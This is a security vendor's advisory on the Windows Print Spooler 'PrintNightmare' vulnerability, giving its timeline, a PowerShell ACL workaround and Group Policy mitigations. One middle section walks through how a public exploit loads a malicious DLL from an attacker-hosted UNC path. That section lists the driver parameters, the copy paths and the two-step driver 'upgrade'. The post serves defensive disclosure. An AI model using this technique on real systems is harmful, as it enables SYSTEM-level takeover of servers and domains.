Windows Print Spooler “PrintNightmare” Vulnerability, Exploits

Posted in: Resources » Cyber Heads-up

TL;DR

There is a Windows vulnerability that uses Print Spooler to gain remote code execution on devices. In the Assura’s Take section, we offer three mitigation options: 1. Disable the print spooler service, 2. Apply an ACL to restrict print driver installation/upgrades. 3. Disable remote connections to the Print Spooler.

Overview

Recently, the security research community has been abuzz with talk of new exploits against the Windows Print Spooler service. Remember Stuxnet? You know, the worm that destroyed the nuclear enrichment centrifuges in Iran, overshot that target, and ended up infecting more than 45,000 networks? This little guy was at the root of that exploit and has continued to be the Achilles’ heel of Microsoft for a while now.

CVE-2021-1675 and subsequently CVE-2021-34527, aka “PrintNightmare,” is a vulnerability that allows an attacker with regular user permissions to run code on a server as SYSTEM. By exploiting this vulnerability either locally or remotely, the attacker will take over complete control of the system with the highest privileges – meaning that if the attacker targets your domain controller, then they own your entire Active Directory.

The kicker? The Print Spooler service is enabled by default on all Windows servers. So, unless you have explicitly disabled the service, your organization is vulnerable.

What Do We Know About This Attack?

Timeline of events that led us here:

  1. 6/16/2021: independent security researchers discovered a bypass of the patch for CVE-2021-1675 and plan to use it during an upcoming competition for Zero-Day vulnerabilities. The news is out in the niche community, and the exploit begins circulation within that small community.
  2. 6/28/2021: a security research team within Chinese security vendor QiAnXin “RedDrip Team” publishes a video demonstrating their bypass of the patch for CVE-2021-1675, demonstrating that it can provide both Local Privilege Escalation and Remote Code Execution. https://twitter.com/RedDrip7/status/1409353110187757575
  3. 6/29/2021: Zhiniang Peng publishes a PoC on GitHub and subsequently removes it but not before it could be cloned and other similar exploits developed based upon it. https://twitter.com/edwardzpeng/status/1409810304091889669
  4. 7/1/2021: Microsoft validates the patch is ineffective and assigns a new CVE number CVE-2021-34527.
  5. 7/2/2021: Microsoft provides updated guidance based on various community workarounds. Still no patch as of 7/6/2021.

The “PrintNightmare” vulnerability is at its core an authentication bypass vulnerability. What Microsoft has intended to occur when loading a printer driver (using RpcAddPrinterDriver) onto a workstation or server is that the remote user has the “SeLoadDriverPrivilege” assigned to them. However, the logic in “ValidateObjectAccess” has an argument within it that is user-controllable. A user who provides the correct value in the user-controlled argument can bypass the security check and then load print drivers to the target device without impediment.

Exploiting PrintNightmare is not as simple as just bypassing the authentication mechanism, however. To exploit this vulnerability the attacker has to load the malicious .dll file in a very specific manner based on what the Spooler service is expecting.

Based on a publicly available exploit, we see the following behavior:

pDataFile = A.dll
pConfigFile = \attackerIPaddress\malicious.dll
pDriverPath= C.dll

RpcAddPrintDriver is called by the attacker.RpcAddPrintDriver will copy 

A.dll, malicious.dll, and C.dll into the folder 

“C:\Windows\System32\spool\drivers\x64\3\new”.

The three files are then copied into 
“C:\Windows\System32\spool\drivers\x64\3”.

The spooler service then loads 

“C:\Windows\System32\spool\drivers\x64\3\A.dll” 
and 
“C:\Windows\System32\spool\drivers\x64\3\C.dll”.

Spooler will then copy pConfigFile (our malicious file) to 

“C:\Windows\System32\spool\drivers\x64\3\malicious.dll”. 

However, notice that the spooler service did not load the malicious .dll file yet.The attacker calls RpcAddPrinterDriver again, this time to do a print driver upgrade. This time the pDataFile (previously A.dll) will be replaced by the malicious.dll location on the target hard drive. This time when the printer drivers are “upgraded” instead of A.dll being loaded the malicious.dll file will be loaded and the attacker has successfully exploited the server.

The reason we are seeing the above exploitation process is that the Spooler service will only load a UNC (Universal Naming Convention) path for pConfigFile but not for pDataFile or pDriverPath so the attacker has to load it to the target machine first and then “upgrade” a printer drive once the malicious file is local so that it can be successfully copied and loaded for exploitation.

Here we provide an example of the exploit on a fully patched Windows Server 2019 conducted by our research team:

Attacker account (low-privileged domain user):

1 Unprivileged Users Properties
2 Unprivileged User Membership

Print Spooler Service in a Running state due to Automatic startup (default setting!):

3 Spooler Service Running State
4 Spooler Service on Automatic Startup

CVE-2021-1675 Patch (KB5003646) has been applied:

5 KB5003646 Patch Applied

Patched version of the Spooler Service for reference:

6 Spooler Service Updated Version

Exploit Video:

Assura’s  Take

There are a number of devastating exploits being circulated on the internet currently. Many of the exploits will work against not only Windows Servers, but any Windows Workstation running the print spooler service.

Assura has a few possible mitigation options organizations can take to ensure they are protected or have reduced the potential for exploitation:

Option 1 – Disable the print spooler service on all devices where printing is not necessary.

Option 2 – Where printing may be necessary but loading of print drivers is not, implement the following ACL workaround provided by TrueSec by using PowerShell:

$Path = “C:\Windows\System32\spool\drivers”

$Acl = (Get-Item $Path).GetAccessControl(‘Access’)

$Ar = New-Object  System.Security.AccessControl.FileSystemAccessRule(“System”, “Modify”, “ContainerInherit, ObjectInherit”, “None”, “Deny”)

$Acl.AddAccessRule($Ar)

Set-Acl $Path $Acl

This will add a Deny rule for the drivers directory and all subdirectories, preventing the SYSTEM account from modifying its contents. With this ACL in place, you will be able to use the server as a print server for remote devices but no new/updated drives will be able to be loaded. The rule can be disabled with the following PowerShell script:

$Path = “C:\Windows\System32\spool\drivers”

$Acl = (Get-Item $Path).GetAccessControl(‘Access’)

$Ar = New-Object System.Security.AccessControl.FileSystemAccessRule(“System”, “Modify”, “ContainerInherit, ObjectInherit”, “None”, “Deny”)

$Acl.RemoveAccessRule($Ar)

Set-Acl $Path $Acl

Option 3 – Microsoft’s guidance is to either 1 – disable the print spooler service altogether as we have suggested in No. 1 as well. Their secondary guidance is to disable inbound remote printing through Group Policy. This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directory attached device will still be possible.

  1. Within Group Policy:
    1. Computer Configuration > Administrative Templates > Printers
    2. Disable the “Allow Print Spooler to accept client connections” policy to block remote connections/attacks.
  2. Restart the Print Spooler service for the group policy to take effect.

The best option for your organization may be different from others, and you may need to implement a combination of the above mitigations as appropriate for your environment based on your printing needs.

Assura has tested the above mitigations and can affirm that the exploits do indeed fail if mitigations are appropriately applied:

7 Example of Failed Exploit Attempt.

In addition to the mitigations, please ensure that you are using up-to-date anti-virus or Endpoint Detection and Response to help prevent and detect any exploitation on your devices. If you are an Assura Managed Endpoint Protection client we are monitoring for exploit attempts in real-time.

If you’re an Assura client, please do not hesitate to reach out to your Virtual ISO or Assura SOC point-of-contact if you have questions about this vulnerability or our response. Otherwise, please contact us.

References: